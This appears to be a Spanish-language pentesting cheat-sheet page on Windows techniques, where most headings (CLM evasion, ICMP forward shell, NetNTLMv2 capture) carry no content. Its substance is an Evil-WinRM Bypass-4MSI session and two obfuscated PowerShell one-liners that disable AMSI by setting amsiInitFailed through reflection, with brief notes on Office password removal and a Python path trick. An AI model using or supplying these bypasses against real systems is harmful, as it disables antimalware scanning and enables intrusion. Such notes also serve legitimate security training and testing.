Bypassing

AMSI

Automatización de WinRM

*Evil-WinRM* PS C:\Users\melanie\Desktop> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

Corromper tarea (Condición de carrera)

$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)
PS C:\Users\Sierra.Frye\Documents>

$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)

Obtención de hash NetNTLMv2 con Windows Defender

CLM

Detección

PSSessions

Ejecución de comandos con funciones

ICMP Forward Shell

Python

Es posible eliminar la ruta que se obtiene de la ruta actual con getcwd() pasándole como argumento un path pero con una barra al principio

En este ejemplo con la cadena /test

Cifrado documentos Office

Al descomprimir el documento, se puede eliminar el hash que contiene a la contraseña

CLM Evasion

PreviousBloodHoundNextEnumeration

Last updated